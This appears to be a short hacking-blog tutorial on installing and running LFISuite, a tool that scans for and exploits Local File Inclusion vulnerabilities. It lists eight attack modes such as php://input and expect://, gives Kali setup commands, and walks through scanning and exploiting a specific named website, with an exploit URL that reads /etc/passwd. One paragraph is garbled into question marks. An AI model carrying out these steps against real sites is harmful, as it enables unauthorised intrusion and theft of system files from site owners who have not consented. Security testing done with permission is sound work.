LFISuite To scan and exploit LFI Vulnerability

What is LFISuite?

?

LFI Suite is a totally automatic tool able to scan and exploit Local File Inclusion vulnerabilities using many different methods of attack, listed in the section

?

LFI Vulnerability ???

LFI ?? ???? ????? ???????? ?? ????????? ?? ????? ???????????? ?????????????? ????? ??? ???? ??????? Malicious ???????? Inject ???? ???? ?? ????????? ?????? ???? ???? ??? ??????? ????????? / ????? ????????? ? ?????? ???? ?????

LFI Suite Provides 8 different Local File Inclusion attack modalities:

● /proc/self/environ

● php://filter

● php://input

● /proc/self/fd

● access log

● phpinfo

● data://

● expect://

?

How to Use LFI Suite

?

> Kali > sudo su > password

> cd Desktop

> git clone https://github.com/D35m0nd142/LFISuite

> cd LFISuite

> ls

> la -la

> chmod +x lfisuite.py

> python2 lfisuite.py

If you get error put this cmd in kali

cp -r /usr/lib/python3/dist-packages/termcolor.py /usr/lib/python2.7/dist-packages

?

LFI Suite Scanner

?

● for scan select 2

● cookoies: enter

● tor proxy: no

● paths: enter

● url to scan: https://ravagedband.com/index.php?page=home.php

Check LFI Vulnerability

LFI Suite will scan your link and find LFI Vulnerability of your link (CNTRL + Z to stop scanning)

?

LFI Suite Exploiter

?

● for Exploiter select 1

● cookoies: enter

● tor proxy: no

● choose payloads: 1

● enter Vulnerabile URL: https://ravagedband.com/index.php?page=/etc/passwd

● choose parameter: 1

Now it will show you the result

?

Read more ethical hacking blogs from here.